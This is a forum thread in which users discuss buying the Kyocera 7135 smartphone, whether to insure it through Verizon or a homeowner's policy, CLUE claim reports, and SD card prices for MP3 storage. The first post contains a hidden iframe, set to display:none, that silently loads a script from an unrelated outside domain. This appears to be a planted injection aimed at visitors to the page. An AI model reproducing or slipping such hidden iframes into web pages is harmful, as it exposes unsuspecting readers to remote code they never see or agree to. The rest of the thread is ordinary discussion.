+ Reply to Thread

7135 bring it with me or not lol

One of the concerns I have now is that with this Kyocera that I'm gonna buy tomorrow is with my v120 c.. i could care less if i lost it and stuff...

with this one though I'd be so mad if i dropped it in the toilet (my motorola did one time lol) or if someone stole it. I mean it would be hard to be without it.. but also like id be paranoid about it and stuff..

Also.. it seems like its a pain in the ass with the mp3s and stuff.. how much extra is that card you would use to store mp3s and stuff ?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Welcome to the board! The easiest answer is to get the insurance from Verizon (4 or 5 bucks a month), and hotsync often. BackupbuddyVFS is good for being able to restore if you are away from the computer and have a hard reset for some reason. You may also want to keep it away from the toilet or from surfaces from which an object could slip into the toilet.

It sounds like the 256 MB SD cards have dropped to around $60 or $70 with a cruzer. A 128mb card will still hold a couple of hours of music and should be $30 or $40, I think. Sounds like people recommend Lexar brand.
    ---------------
    The same thing we do every night, Pinky...

Fully Converged
    I agree on getting the insurance, then you only have a $35 deductible and you have a replacement phone within 2 days or so.
    I'm using the Sandisk 256MB SD cards from Costco. You can pick up a cruzer SD reader/writer on ebay new with a card in it for about $75 or so and have hours of music and videos and jpgs to play with on the road.
    One of the reasons I have been using smart phones for a while now is for wireless internet access when I'm travelling. It's so easy to pick up my email in between flights, rather than firing up my laptop and searching for an available data port in a public pay phone.
    Try it; you might like it!
    From the Middle of the Sea ;-)

hes in canada, i wonder if insurance would go through my regular broker (with whom I have car and home)

Dreaderus

I got my Cruzer with 256MB SD card from ecost.com for about $65. If you're looking for just the card, I know they sell them at very reasonable prices as well.

www.ecost.com

Dreaderus, some folks have opted to go through their homeowner's insurance. It sounds like it costs about the same; I suspect the main difference is the reimbursement process. Now that I'm thinking about it, though, maybe a homeowner's rider is the way to go. My ins. co. pays replacement cost, so I would be able to buy a new one, instead of having to take a warranty replacement...

Now I'm going to have to put my thinking cap on for a while...
    ---------------
    The same thing we do every night, Pinky...

I've gone through my homeowner's policy and I get full replacement cost. If you use VZW insurance, I assume you get a refurbished phone.

hmm.

Does homeowners insurance cover it you say lose it on the road ? or would you have to lie about it and stuff lol

My policy covers it for any loss or damage, inlcuding if I just leave it somewhere.

Phone Insurance

But what is the deductible on your homeowner's policy? Mine is very high, compared to the cost of a phone (well, maybe not this phone, but I think my policy has a $500 per loss deductible). Or, is there a separate deductible for this sort of loss?

Also, is there a big hassle involved in filing a claim with your homeowners insurance? The Verizon phone insurance is almost totally painless--when my daughter got pushed in a pool with her Startac a few years ago, she had a new phone (still a crappy Startac, mind you in two days, with one phone call. Can't beat that! They didn't even want the dead phone back, although they would have sent me a prepaid box for it, if they had.

That said, I think I want to talk to my insurance agent, since my famliy is paying almost $200 a year for insurance on our 4 Verizon phones.

St

I have a separate rider on my homeowner's policy with a separate $50 deductible. As a practical matter, if the phone is lost, stolen or damaged, I go out and buy a new one and get a check from my insurance company. It may not be as convenient at the Verizon insurance, but there has been a lot of confusion about whether Verizon is actually covering the 7135. If they are, I would probably go that way.

The home owner's route is bad advice. If you follow the insurance industry, you will know that home owners is a bit of a "loss leader" for insurance companies. Meaning that the profits are slim in this segment of the market.

Since insurance companies have been seeing their bottom lines shrink, most of them are looking for ways to cut off unprofitable business. Some companies have adopted a 2 or 3 strike rule (2 claims and they will opt not to renew). Most others have hiked their rates.

Why would you want to endager your home coverage by including something that has fair probability to be dropped, stolen, lost, crushed, etc.?

Separate insurance is the way to go.

Hmmm.... I have some evidence that supports the position that homeowners insurance is a bad way to go:

I just bought a new house in New Mexico, and the carrier we went with supposedly charged us a higher rate and was "concerned" about a claim that they thought I made in some database search they did. Turns out they did a bad search, or got a hit with someone with the same name as me. However, after that was supposedly cleared up, the rate didn't go down, reinforcing my bad opinion of insurance companies.

I see from a search on "Verizon Insurance" that there was some confusion on whether the 7135 would be covered by the standard Verizon Insurance policy. I was totally unaware of this when I got my phone, and as far as I know it is covered. For some unknown reason, I actually thought to ask the person in the Boulder Verizon store if my insurance was going to be automatically transferred to the new phone last week, and she said it would be, and showed me that it was still on the bill.

St

I don't disagree with your statement of the problems with going the rider route, though if you rarely make claims and carry a lot of insurance with the same company, you shouldn't have a problem with one claim for the phone. I wouldn't do it twice. The problem with separate insurance is getting it. On another thread someone already reported problems getting VZW to honor the insurance they thought they had. As far as I know, it is not clear yet whether VZW will insure the 7135. There is a reluctance on the part of some insurance companies that back this insurance to cover expensive high tech items. From reports here, they don't cover the Thera.

Clue Reports

I'm a Realtor. We're becoming aware insurance companies subscribe to a central database to obtain "Clue Reports" on homes and on individuals. If *too many* claims are made on an insurance policy it may become very expensive, or nearly impossible, to obtain homeowners insurance - from any company. I'd not want to risk my ability to obtain and keep affordable homeowners insurance over a relativley low cost (compared to a home) tech device. Talk to your insurance agent for pros and cons.